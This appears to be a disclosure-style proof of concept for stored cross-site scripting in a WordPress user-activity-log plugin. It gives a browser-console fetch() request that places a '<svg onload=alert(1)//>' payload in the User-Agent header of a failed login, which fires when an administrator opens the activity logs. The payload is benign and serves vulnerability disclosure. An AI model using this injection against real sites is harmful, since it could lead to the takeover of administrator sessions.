## https://sploitus.com/exploit?id=WPEX-ID:78EA6FE0-5FAC-4923-949C-023C85FE2437
1) Make sure the plugin's `Enable User Agent For Log` setting is set at /wp-admin/admin.php?page=ualp_settings
2) If you're logged onto the site, log out.
3) While still on the site, send the following fetch() command from your browser's console:
```
await fetch("/wp-login.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0<svg onload=alert(1)//>",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://vulnerable-site.tld/wp-login.php",
"body": "log=simpleadmin&pwd=invalidpassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1",
"method": "POST",
"mode": "cors"
});
```
4) Log back as an administrator, and go see the user logs at /wp-admin/admin.php?page=ual_pro. You should get an alert box, which indicates the attack succeeded.